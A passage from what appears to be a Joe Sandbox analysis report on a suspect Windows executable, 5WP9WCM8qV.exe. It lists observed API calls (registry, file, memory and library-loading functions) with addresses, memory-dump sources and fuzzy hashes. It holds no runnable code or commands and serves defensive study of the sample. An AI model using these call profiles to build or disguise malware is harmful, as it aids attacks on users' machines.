                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 334405425-0
                                        • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                        • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                        • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                        • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                        APIs
                                        • GlobalFree.KERNEL32(006BD0B8), ref: 00401BA7
                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID: Call
                                        • API String ID: 3394109436-1824292864
                                        • Opcode ID: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                        • Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
                                        • Opcode Fuzzy Hash: 3223036e7e2fecee151538c34771c34e58526c9ebab93d957a64f6eea7189736
                                        • Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D
                                        APIs
                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1
                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Enum$CloseOpenValue
                                        • String ID:
                                        • API String ID: 167947723-0
                                        • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                        • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                        • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                        • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1530332334.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000000.00000002.1530306848.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530357897.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000000.00000002.1530384976.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_10000000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastRead
                                        • String ID:
                                        • API String ID: 1948546556-0
                                        • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                        • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                        • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                        • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                        APIs
                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1
                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse2681.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                        • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                        • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                        • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                        • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                        • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                        • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                        APIs
                                          • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1
                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValue
                                        • String ID:
                                        • API String ID: 849931509-0
                                        • Opcode ID: 38c1c2e2910efdab77a0f506319982341923413d10215031dfad05f280175cff
                                        • Instruction ID: c2222f3894d46b01c01a36c2377af854b7dcf2fa525412944523e76cc0079291
                                        • Opcode Fuzzy Hash: 38c1c2e2910efdab77a0f506319982341923413d10215031dfad05f280175cff
                                        • Instruction Fuzzy Hash: 2DF04F32A04110ABEB11BFB59B4EABE72699B80314F15803BF501B71D5D9FC99015629
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 00405297
                                          • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004052E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: InitializeMessageSendUninitialize
                                        • String ID:
                                        • API String ID: 2896919175-0
                                        • Opcode ID: 284ed0bdb174dded287a17afd61ba591e3d7c1dcaafaf06757c609fafc5d4012
                                        • Instruction ID: 8fb8f8de99d5f56c4d821e97e238feb66d9b0dc6248f5ee9fd766251fcc57a44
                                        • Opcode Fuzzy Hash: 284ed0bdb174dded287a17afd61ba591e3d7c1dcaafaf06757c609fafc5d4012
                                        • Instruction Fuzzy Hash: FFF0FA769006009BE30057A4AD01BA372A8EFD4321F19407EFE84B62E1CB79A8808E2D
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                          • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                          • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                          • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                        • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                        • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                        • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\5WP9WCM8qV.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                        • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                        • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                        • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                        • GetLastError.KERNEL32 ref: 00405714
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                        • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                        • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                        • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                          • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: FilePointerwsprintf
                                        • String ID:
                                        • API String ID: 327478801-0
                                        • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                        • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                        • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                        • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                        APIs
                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: PrivateProfileStringWrite
                                        • String ID:
                                        • API String ID: 390214022-0
                                        • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                        • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                        • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                        • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000000,000002CA,00000000,00000022,00000000,?,?), ref: 00402CF1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                        • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                        • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                        • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1524855896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1524837992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524872461.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524885147.0000000000458000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1524991878.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_5WP9WCM8qV.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                        • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
